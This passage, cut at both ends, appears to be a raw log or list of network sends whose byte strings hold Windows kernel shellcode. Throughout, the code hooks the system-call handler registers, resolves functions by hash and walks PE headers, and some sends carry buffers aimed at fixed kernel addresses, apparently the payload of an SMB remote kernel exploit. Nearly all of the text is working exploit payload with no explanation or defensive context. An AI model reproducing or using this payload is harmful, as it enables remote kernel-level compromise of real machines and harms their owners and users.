\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\[email\u00a0protected]\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\[email\u00a0protected]\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 11, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\[email\u00a0protected]\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\[email\u00a0protected]\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\[email\u00a0protected]\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\[email\u00a0protected]\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\[email\u00a0protected]\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\[email\u00a0protected]\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\[email\u00a0protected]<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\[email\u00a0protected]\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\[email\u00a0protected]\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0